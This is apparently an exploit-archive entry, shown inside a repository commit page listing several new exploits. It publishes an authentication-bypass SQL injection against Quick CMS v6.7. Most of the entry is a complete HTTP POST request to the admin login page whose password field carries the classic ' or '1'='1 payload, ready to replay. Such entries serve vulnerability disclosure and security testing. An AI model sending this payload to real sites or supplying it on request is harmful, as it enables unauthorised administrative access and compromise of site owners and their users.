
6 changes to exploits/shellcodes/ghdb Computer Laboratory Management System v1.0 - Multiple-SQLi Petrol Pump Management Software v1.0 - Remote Code Execution (RCE) Quick CMS v6.7 en 2023 - 'password' SQLi Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS) ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
39 lines
No EOL
1.3 KiB
Text
39 lines
No EOL
1.3 KiB
Text
# Title: Quick CMS v6.7 en 2023 - 'password' SQLi
|
|
# Author: nu11secur1ty
|
|
# Date: 03/19/2024
|
|
# Vendor: https://opensolution.org/
|
|
# Software: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip
|
|
# Reference: https://portswigger.net/web-security/sql-injection
|
|
|
|
# Description: The password parameter is vulnerable for SQLi bypass authentication!
|
|
|
|
[+]Payload:
|
|
```mysql
|
|
POST /admin.php?p=login HTTP/1.1
|
|
Host: localpwnedhost.com
|
|
Cookie: PHPSESSID=39eafb1sh5tqbar92054jn1cqg
|
|
Content-Length: 92
|
|
Cache-Control: max-age=0
|
|
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
|
|
Sec-Ch-Ua-Mobile: ?0
|
|
Sec-Ch-Ua-Platform: "Windows"
|
|
Upgrade-Insecure-Requests: 1
|
|
Origin: https://localpwnedhost.com
|
|
Content-Type: application/x-www-form-urlencoded
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
|
|
(KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
|
|
Accept:
|
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-User: ?1
|
|
Sec-Fetch-Dest: document
|
|
Referer: https://localpwnedhost.com/admin.php
|
|
Accept-Encoding: gzip, deflate, br
|
|
Accept-Language: en-US,en;q=0.9
|
|
Priority: u=0, i
|
|
Connection: close
|
|
|
|
sEmail=kurec%40guhai.mi.huq&sPass=%27+or+%271%27%3D%271&bAcceptLicense=1&iAcceptLicense=true
|
|
|
|
``` |